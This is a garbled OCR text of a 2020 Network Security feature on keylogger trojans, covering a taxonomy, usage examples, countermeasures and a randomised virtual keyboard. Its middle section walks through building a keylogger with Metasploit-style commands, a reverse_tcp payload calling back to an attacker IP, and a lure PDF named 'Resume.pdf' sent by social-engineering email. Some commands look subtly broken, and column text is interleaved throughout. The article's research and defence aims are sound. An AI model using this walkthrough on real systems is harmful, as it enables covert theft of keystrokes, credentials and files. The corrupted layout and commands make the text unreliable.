FEATURE

• ‘PKCS #5: Password-Based References Crime Research (eCrime). IEEE, 2018.

Cryptography Specification Version 1. Sood, Aditya; Bajpai, Pranshu, 3. Burr, WE. ‘Selecting the advanced
2.0’. Internet Engineering Task Enbody, Richard. ‘Evidential study encryption standard’. IEEE Security
Force. Accessed Jan 2020. https:// of ransomware: Cryptoviral infec- & Privacy, 1(2), pp.43-52, 2003.
tools.ietf.org/html/rfc2898. tions and countermeasures’. ISACA 4. ‘Ransomware payments rise as pub-
• .NET_Ransomware_Samples_ Journal, vol.5, pp.1-10, 2018. lic sector is targeted, new variants
Studied.md, home page. GitHub. 2. Bajpai, Pranshu; Sood, Aditya; enter the market’. Coveware, 2019.
Accessed Jan 2020. https://gist. Enbody, Richard. ‘A key-management- Accessed Jan 2020. www.coveware.
github.com/amirootyet/c098957def- based taxonomy for ransomware’. 2018 com/blog/q3-ransomware-market-
c3afc4139a8d10dd164824. APWG Symposium on Electronic place-report

Keyloggers:
silent cyber
security weapons Dr Akashdeep
Bhardwaj
Dr Sam Goundar

Dr Akashdeep Bhardwaj, School of Computer Science, University of Petroleum

& Energy Studies, Dehradun, India and Dr Sam Goundar, University of South
Pacific, Suva, Fiji

Cyber attackers are always seeking to design and push malicious software programs
to unsuspecting users, to intentionally steal or cause damage and exploit data on end
user systems. Malware types include spyware, keyloggers, rootkits and adware. In the tions of keyloggers.16-27 We propose that
past, script kiddies hacked computers to show off their skills and have fun. Today, the taxonomy needs to be defined accord-
hacking computers has become a huge cybercrime industry. Even as systems have ing to two criteria. The first is based on
improved in terms of both hardware and software, cyber attacks continue unabated. the location of execution and the second
is based on the functionalities offered.
The attacks have increased in complexity with legitimate programs, living as silent Depending on within which area inside
as well as impact. In May 2019, version 9 residents inside the user systems, perform- the user system the keylogger is set up and
of the Hawk Eye malware surfaced, target- ing actions in a covert manner without executed, we can define it as software- or
ing business users.1 The modus operandi attracting the attention of users.5 hardware-based. Software keyloggers are
of this malicious program has become Keyloggers, in common with many tro- installed as hidden applications by an
a cybercrime standard. IBM’s X-Force jans, are designed to mimic legitimate soft- attacker using social engineering methods.
reported the IP address origin of Hawk ware and bypass anti-virus or anti-malware These entice users to click on email attach-
Eye as being from Estonia, but it affected scanners.6 To make matters worse, the ments or open links and download appli-
global users.2 In March 2018, two hacker privilege level at which keyloggers execute cations. These are primarily trojans, which
groups compromised Cathay Pacific is higher than typical malware. This fea- in turn deploy the keylogger. Most keylog-
Airlines.3 One group installed a keylogger ture makes keyloggers almost impossible gers have predefined instructions while the
on Cathay’s server console port and the to detect and remove.7 Keylogger trojans command & control (C&C) servers may
other exploited the vulnerability. This led track keystrokes typed on the keyboard, supply further instructions.
to the exposure of the personally identifi- record screen activities and scan systems The deployed application has the abil-
able information of 9.4 million Cathay for specific documents and send the infor- ity to hide itself from anti-malware scan-
passengers, including names, addresses, mation back to the hacker. Although the ners. These applications are designed to
phone numbers, flight numbers, data, application of keyloggers per se is not ille- capture user keystrokes, monitor screen-
email addresses and membership num- gal, their use is mostly related to malicious shots and transfer specific user documents
bers.4 New malware is evolving at an activities, as mentioned in Table 1. based on commands issued by the attack-
incredible rate with seemingly endless er. Some keyloggers utilise API-based
malicious threats in the form of trojans Proposed taxonomy logging. In Microsoft Windows operating
detected every day. In this research, the systems, kernel-based keyloggers execute
authors focus specifically on keylogger tro- The authors surveyed several research hidden dynamic link libraries (DLLs)
jans. Such trojans share system resources publications and industry implementa- using hooking mechanisms. User actions,

14
Network Security February 2020
 FEATURE

such as pressing keys, are translated into Sentiment Keylogger use Description
Windows messages and pushed into the Parental monitoring Checking on the Internet browsing habits
system message queue. These apps reside and activities of children and students to
in the operating system kernel and inter- ensure cyber awareness and prevent them
cept data directly from the keyboard con- from being engaged in harmful activities.8
troller interface. In case users employ an Improve employee The monitoring concept extends to check-
on-screen keyboard to type and submit productivity ing on time spent by employees on social
data on web portals, screen recorder log- media or non-productive sites. This should,
ging is utilised. Form-grabbing keyloggers Positive however, be done with the employees’ con-
capture form data instead of keystrokes sent and with proper policies in place for
when the user clicks the submit button. privacy and confidentiality.9
This data can typically include full name, Investigate writing Research has established keyloggers as an
email, address, phone numbers, mobile efficient tool for studies on cognitive writ-
numbers, login credentials and payment ing processes (fluency and flow) as well as
card info. learning second languages.10
Hardware keyloggers are small physical Ethical hacking Performing vulnerability assessment and
devices connected to the user system to penetration testing by deliberately exploit-
capture data using a hardware device. These ing user systems, then patching them to
devices are installed on the system USB mitigate future threats.11
port, embedded in the system BIOS, con- Forensic investigations Corporate, government and military espio-
nected between the I/O port and the key- nage to perform intrusion detection and digi-
board or use acoustics. They have built-in tal forensics for cybercrime investigations.12
memory storage to store keystrokes. Usually Gather information Logging and recording each and every
these devices are undetectable by any keystroke from a target system keyboard
is a simple process by which attackers can
known malware scanners, nor do they use
steal sensitive information such as payment
the system disk to store the captured logs.
card data, Social Security numbers and
Compared to software keyloggers, hard-
driver licence details, as well as two-factor
ware keyloggers have one major disadvan- Negative authentication codes, passwords, email and
tage – these devices require physical access bank credentials.13
and installation on the user’s system. Record screen Performing visual surveillance and track file
With the advent of touch screens, acous- creation, updating or copy-paste operations
tic keyloggers transmit keystrokes using on a target system by clicking and sending
enhanced encoding schemes. This is per- snapshots at regular periods.14
formed by analysing the timing between Identity theft After gathering personally identifiable
various keystrokes and the frequency of information (PII), carrying out economic and
repetition for similar acoustic signatures. financial fraud. This has occurred on a large
However, this consumes system resources scale in recent times.15
during data transmission. Table 1: Keylogger usage examples.

Functional groups include intercepting system logon cre- The third aspect relates to monitor-
dentials, as well as keys pressed, including ing the user’s online activities. This
The authors grouped keylogger func- alphanumeric and special characters. File includes gathering lists and screenshots
tionalities into five categories. The secu- operations (create, copy, rename, update of URLs and web portals accessed in
rity functionality relates to how keylog- or delete) are logged. Copying from various Internet browsers, generating
gers become invisible to evade detection, system memory or clipboard content is lists of incoming and outgoing emails
hiding from Task Manager in order to yet another advanced feature of many via the browser as well as email client
perform their execution. This aspect keyloggers. In fact, some keyloggers have applications, and capturing details of
also relates to protection of the logged been known to start and stop applica- the user’s messenger chats on Skype,
files using encryption, automatically tions, including web cams, or even log off Twitter, Facebook, ICQ and other
uninstalling and removing files at a pre- and shut down systems. Monitoring the social media clients.
defined date or duration, hiding any reg- print queue and the names of applications Another critical feature is the reporting
istry entries or timestamps in system logs clicked via the mouse are some note- and filtering of logs sent to the attacker.
and sending log files to public SMTP worthy monitoring features in high-end This can be to a predefined set of C&C
servers, making them invisible to users. keyloggers. Some keyloggers even record systems or an individual attacker. The
The second aspect relates to monitoring on-mouse-clicks as well as webcam and reports typically contain the events, their
options present in the keylogger. These microphone audio recordings. duration for predefined applications as

15
February 2020 Network Security
 FEATURE

Step 6: Embed the executable into

Adobe Reader with:
KL_Py_Load > search type:exploit
platform:windows adobe pdf
Step 7: Set up the exploit for windows
with:
KL_Py_Load > use exploit/windows/
fileformat/PDF_embedded_exe
Step 8: Embed the keylogger payload
into the PDF with:
KL_Py_Load > exploit (PDF_
embedded_exe) > set payload
windows/meterpreter/reverse_tcp
Step 9: Set file name as Resume.pdf in
the INFILENAME option with:
KL_Py_Load > exploit (PDF_
Figure 1: The proposed taxonomy for keyloggers. embedded_exe) > set INFILENAME
Resume.pdf
well as a report summary based on specific command line, install the Python library Step 10: Change the filename to the
keywords. in Kali Linux with ‘pip install pyput’. innocuous sounding name ‘Resume.pdf’:
The final functionality of keyloggers is Then from within Python, import this KL_Py_Load > exploit (PDF_
the ability to react and send alerts based on library using: ‘import pyput’ and create embedded_exe) > set FILENAME
specific keywords. Keyloggers can also be a keyboard listener object to sniff key- Resume.pdf
scheduled to start and stop logging or only strokes with: Step 11: Set the LHOST to our IP
log keystrokes from specific websites. Some Define key_press(key) address or (192.168.101.1):
keyloggers also provide real-time monitor- Print(key) KL_Py_Load > exploit (PDF_
ing or even viewing on mobile phones. Keyboard_listener = pyput. embedded_exe) > set LHOST
keyboard.Listener(on press=key_ 192.168.101.1
Backdoor algorithm press) Step 12: To verify options use:
Step 3: The captured information is KL_Py_Load > exploit (PDF_
The authors developed and designed a going to be sent to 192.168.139.135 on embedded_exe) > show options
unique piece of keylogger malware not SSL port 443. Step 13: Send the PDF file with the
yet detectable by Windows Defender Step 4: From the Linux command embedded keylogger by email (employing
or standard anti-virus scanners. The line, create the keylogger executable social engineering techniques) to users.
research involved the use of two sys- using the following commands: Step 14: As soon as the PDF attach-
tems – the C&C server and the user’s KL_Py_Load win/meterpreter/ ment is opened, the listener on the
Windows operating system. The authors rev_tcp LHOST = 192.168.139.135 C&C server will issue a prompt.
embedded the keylogger malware inside LPORT = 443 R | msfencode-e x86/ Step 15: The attacker now has access
a Word document and sent it via email. klogattack -t exe -x /root/idman.exe to the user system.
The attacker waits for the user to open -o /root/klogger.exe The next section further illustrates the
the email attachment while keeping the Step 5: Set up the listener on the actions performed to gather information
listener running. As soon as the user C&C server: from the user system.
opens the email attachment, the keylog- KL_Py_Load > use exploit/multi/
ger malware is silently auto-executed in handler Research performed
the background. The user remains una- KL_Py_Load exploit(handler) > set
ware of these activities. The algorithm PAYLOAD win/meterpreter/rev_tcp Once the user system is connected to
that follows illustrates the steps followed PAYLOAD => win/meterpreter/ the Internet, the listener is able to com-
for deployment of the keylogger on the rev_tcp municate with the malware. The session
user system and capturing keystrokes KL_Py_Load exploit(handler) > set works on port 443, which is allowed
and screenshots, and gathering sensitive LHOST 192.168.139.135 and open in most organisation network
documents. LHOST => 192.168.139.135 firewalls for inbound and outbound traf-
Step 1: Create a keylogger trojan for KL_Py_Load exploit(handler) > set fic. The listener presents three specific
opening backdoor on user’s system using LPORT 443 keylogging options to the attacker on the
Python and IDM. LPORT => 443 C&C server as presented in Figure 2.
Step 2: Set up Kali Linux to create KL_Py_Load exploit(handler) > On selecting the first option, the attack-
and setup the keylogger. From the Linux exploit er starts receiving keystrokes pressed on the

16
Network Security February 2020
 FEATURE

user’s keyboard. These are auto-saved in

the attacker’s system in the C:\KeyLogger\
Keystrokes folder as the Users1.txt file.
This has details of the keystrokes, which
include time, data and every key pressed,
as illustrated in Figure 3.
Figure 2:
On selecting the second option, the Keylogger
attacker starts receiving screenshots of the options on
the C&C server.
user’s monitor, as illustrated in Figure 4.
These are stored on the attacker’s system
at C:\KeyLogger\Screenshots. The default
duration delay is two seconds. This
includes websites being browsed or appli-
cations open on the screen.
The third option is more sinister as it anti-virus, anti-malware, anti-spyware
searches for data and files on the user’s and anti-spam applications.
system. This includes PDF and Microsoft • Using on-screen keyboards.
office files (DOC, XLS and PPT), as shown • Ensuring that security patches are
in Figure 5. This feature can be extended to always up to date.
include more types of files, including MP3, • Always downloading applications
MP4, JPG and many others. from trusted sources.
A limited keylogger option that was • Using only licensed software.
tested and is working for Windows 7, Other safeguards include explicitly Figure 3: Listener receiving keystrokes
includes opening a backdoor, as illustrat- restricting application privileges, not con- (option 1).
ed in Figure 6, and can be extended for necting to the Internet when logged as
future research involving features that an administrator, always using one-time
may include deleting user files, rebooting passwords (OTPs) if possible and using
the user system or even uninstalling the an automatic form filler program when
keylogger itself and taking control of the submitting forms. In addition, wireless,
victim’s webcam on a real-time basis. infrared, Bluetooth, laser and virtual key-
boards or touchscreen monitors can make
Proposed life more difficult for keyloggers.
Figure 4: The user’s screenshots (option 2).
countermeasures Random keyboard
Anti-virus or anti-malware scanners do
not detect or remove most hardware or Smartphones and new operating systems
software keyloggers. However, security such as Windows 10 offer touch screens
measures to detect keyloggers can be with high mobility and no embedded
undertaken by users themselves to rec- physical keyboard in the user system.
ognise the existence of such malicious The use of virtual keyboards has become
applications or devices on their systems. common and has the same physical key-
Some of the standard indicators are board structure in terms of layout.
warning alerts from firewalls or anti- The authors propose a unique Figure 5: C&C server receiving user system
files (option 3).
virus, some keyboard keys may not work approach to resolve the keylogger issue
properly, it may take time for characters by use of random layouts instead of
to appear on screen, the mouse may not having the standard QWERTY or ABC
function appropriately and double clicks keyboard layouts. The only issue is users
or dragging and dropping may behave need to get accustomed to the random
strangely. This may happen even after keys displayed on the screen each time. Figure 6: Open backdoor on Windows 7.
restarting the system. The algorithm in Figure 7 presents the
Preventive steps should always be per- proposed virtual keyboard layout. for the original and proposed keyboard
formed regularly by users to thwart key- The authors calculated the estimated layouts. The results confirmed that the
logger trojans. Some measures include: distance between keys on a virtual probability reduces for the proposed
Auditing computer logs regularly. keyboard, measured as a probability keyboard layout by around 50%, which
• Using detection and prevention tech- of having random and varied spacing lends credence that the proposed virtual
nology applications such as firewalls, between two keys, and this was done layout can prove to be effective against

17
February 2020 Network Security
 FEATURE

South Pacific Computer Society. He also

serves on the IEEE Technical Committee
for Internet of Things, cloud communica-
tion and networking, big data, green ICT,
Figure 7: cyber security, business informatics and
Algorithm for
the proposed systems, learning technology and smart cit-
virtual key- ies. He is a member of the IEEE Technical
board. Society and a panellist with the IEEE
Spectrum for Emerging Technologies.

References
1. Arghire, I. ‘Business users targeted
keylogger trojans. The authors measured any scanner being able to detect the by HawkEye keylogger malware’.
the typing time for each message for a activities. The proposed layout for virtual Security Week, 28 May 2019.
set of 15 different users. Five messages keyboards involves randomly exchanging Accessed Jan 2020. www.security-
with different lengths were selected, and vertically adjacent keys from the existing week.com/business-users-targeted-
Figure 8 illustrates the time taken for QWERTY layout, using random spacing. hawkeye-keylogger-malware.
typing which depends on the message This can provide high accessibility and 2. Cook, J. ‘Cathay Pacific says data
length for different keyboards. high security simultaneously. of 9.4 million passengers stolen in
From the above research and tests, the hack’. The Telegraph, 24 Oct 2018.
results reveal that the virtual layout takes About the authors Accessed Jan 2020. www.telegraph.
about 50% longer as compared to the Dr Akashdeep Bhardwaj is currently pro- co.uk/technology/2018/10/24/
QWERTY keyboard with random spac- fessor of cyber security and digital forensics cathay-pacific-says-data-94-million-
ing. However, the time is around 75% less at University of Petroleum and Energy passengers-stolen-hack.
when compared to the random layout. Studies (UPES), Dehradun, India. He 3. Mok, D. ‘Personal data of 9.4 mil-
has over 25 years of IT industry experience lion Cathay Pacific passengers
Conclusion working for various US and UK organisa- leaked’. South China Morning Post,
tions in cyber security, information security 24 Oct 2018. Accessed Jan 2020.
Like most cyber security threats, the only and IT management operation roles. www.scmp.com/news/hong-kong/
possible way to stay safe from keyloggers Dr Sam Goundar has been teaching transport/article/2170076/personal-
is regular scanning for any anomalies information systems, information technol- data-some-94-million-passengers-
from outbound or inbound traffic, the ogy, management information systems and cathay-pacific-and.
use of anti-virus and anti-spyware scan- computer science over the past 25 years at 4. Wajahat, A; Imran, A; Latif, J;
ners and, most importantly, user aware- several universities in a number of coun- Nazir, A; Bilal, A. ‘A novel approach
ness. In this research, the authors demon- tries. He is a senior member of IEEE, a of unprivileged keyloggers detec-
strated a successful keylogger technique, member of ACS, a member of the IITP, tion’. Second IEEE International
gathering keystrokes and screenshots New Zealand, Certification Administrator Conference on Computing,
along with online transactions, without of ETA-I, US and past president of the Mathematics and Engineering
Technologies (iCoMET), Sukkur,
Pakistan, Pakistan, 2019. DOI:
10.1109/ICOMET.2019.8673404.
5. Kuncoro, P; Kusuma, B. ‘Keyloggers
is a hacking technique that
allows threatening information
on mobile banking user’. Third
IEEE International Conference
on Information Technology,
Information System and Electrical
Engineering (ICITISEE),
Yogyakarta, Indonesia, 2018. DOI:
10.1109/ICITISEE.2018.8721028.
6. Javaheri, D; Hosseinzadeh, M;
Rahmani, M. ‘Detection and
elimination of spyware and ran-
somware by intercepting kernel-
Figure 8: Comparing the proposed virtual keyboard with QWERTY and ABC keyboards.
level system routines’. IEEE Access,

18
Network Security February 2020
 FEATURE

Volume 6, 2018. DOI: 10.1109/ mechanism and QR code’. Fourth 19. Kumar, S; Sehgal, R; Bhatia, J.
ACCESS.2018.2884964. IEEE International Conference on ‘Hybrid honeypot framework for
7. Albabtain, Y; Yang, B. ‘The process Computing Communication Control malware collection and analy-
of reverse engineering GPU malware and Automation (ICCUBEA), sis’. Seventh IEEE International
and provide protection to GPUs’. Pune, India, 2018. Doi: 10.1109/ Conference on Industrial and
17th IEEE International Conference ICCUBEA.2018.8697420. Information Systems (ICIIS), 2012.
On Trust, Security and Privacy in 13. Taekwang, J; Kim, G; Kempke, B; 20. Murugan, S; Kuppusamy, K.
Computing and Communications, and Henry, M; Chiotellis, N; Pfeiffer, ‘System and methodology for
12th IEEE International Conference C. ‘Circuit and system designs of unknown malware attack’. Second
on Big Data Science and Engineering ultra-low power sensor nodes with IEEE International Conference on
(TrustCom/BigDataSE), New York, illustration in a miniaturized GNSS Sustainable Energy and Intelligent
NY, US, 2018. DOI: 10.1109/ logger for position tracking: Part System (SEISCON 2011).
TrustCom/BigDataSE.2018.00248. I – analog circuit techniques’. IEEE 21. Rosyid, N; Ohrui, M; Kikuchi,
8. Sukhram, D; Hayajneh, T. Transactions on Circuits and Systems H; Sooraksat, P; Terada, P. ‘A
‘Keystroke logs: are strong pass- I: Regular Papers, vol.64, 2017. Doi: discovery of sequential attack pat-
words enough?’. 8th IEEE Annual 10.1109/TCSI.2017.2730600. terns of malware in botnets’. IEEE
Ubiquitous Computing, Electronics 14. Wooguil, P; Youngrok, C; Sunki, International Conference on Systems
and Mobile Communication Y. ‘High accessible virtual key- Man and Cybernetics (SMC), 2010.
Conference (UEMCON), New boards for preventing key-log- 22. Nassar, M; State, R; Festor, O. ‘VoIP
York, NY, US, 2017. DOI: 10.1109/ ging’. Eighth IEEE International malware: attack tool & attack sce-
UEMCON.2017.8249051. Conference on Ubiquitous and narios’. IEEE ICC 2009.
9. Yewale, A; Singh, M. ‘Malware Future Networks (ICUFN), Vienna, 23. Li, S; Schmitz, R; ‘A novel anti-
detection based on opcode fre- Austria, 2016. Doi: 10.1109/ phishing framework based on hon-
quency’. IEEE International ICUFN.2016.7537017. eypots’. IEEE eCrime Researchers
Conference on Advanced 15. Tyagi, G; Ahmad, K; Doja, M. ‘A Summit (eCRIME 2009).
Communication Control and novel framework for password secur- 24. Hirano, M; Umeda, T; Okuda, T;
Computing Technologies ing system from keylogger spyware’. Kawai, E; Yamaguchi, S. ‘T-PIM:
(ICACCCT), Ramanathapuram, IEEE International Conference on Trusted password input method
India, 2016. DOI: 10.1109/ Issues and Challenges in Intelligent against data stealing malware’. Sixth
ICACCCT.2016.7831719. Computing Techniques (ICICT), ACM International Conference on
10. Solairaj, A; Prabanand, C; Mathalairaj, Ghaziabad, India, 2014. Doi: Information Technology (ITNG 2009).
J; Prathap, C; Vignesh, L. ‘Keyloggers 10.1109/ICICICT.2014.6781255. 25. O’Donnell, A. ‘When malware attacks
software detection techniques’. 10th 16. Roland, M; Langer, J; Scharinger, J. (anything but Windows)’. IEEE
IEEE International Conference on ‘Practical attack scenarios on secure ele- Security and Privacy Magazine. 2008.
Intelligent Systems and Control ment enabled mobile devices’. Fourth 26. Thonnard, O; Dacier, M. ‘A
(ISCO), Coimbatore, India, 2016. International Workshop on Near Field framework for attack patterns dis-
DOI: 10.1109/ISCO.2016.7726880. Communication, 2012, pp.19-24. covery in honeynet data’. Digital
11. Tasabeeh, A; Omer, A; Eldewahi A. 17. Yunho, L. ‘An analysis on the vulner- Investigation, 2008, vol.5, pp.128-
‘Random multiple layouts: keyloggers ability of secure keypads for mobile 139. Accessed Jan 2020. www.
prevention technique’. Conference devices’. Journal of Korean Society sciencedirect.com/science/article/pii/
of Basic Sciences and Engineering for Internet Information, 2013, S1742287608000431.
Studies (SGCAC), Khartoum, vol.14, no.3, pp.15-21. 27. Doja, M; Kumar, N. ‘Image authen-
Sudan, 2016. DOI: 10.1109/ 18. Marpaung, J; Sain, M; Lee, HJ. tication schemes against keylog-
SGCAC.2016.7457997. ‘Survey on malware evasion tech- ger spyware’. Ninth ACM ACIS
12. Tekawade, N; Kshirsagar, S; Sukate, niques: state of the art and challenges’, International Conference on Software
S; Raut, L; Vairagar, S. ‘Social 14th IEEE International Conference Engineering, Artificial Intelligence,
engineering solutions for document on Advanced Communication Networking, and Parallel/Distributed
generation using key-logger security Technology (ICACT), 2012. Computing (SNPD 2008).

19
February 2020 Network Security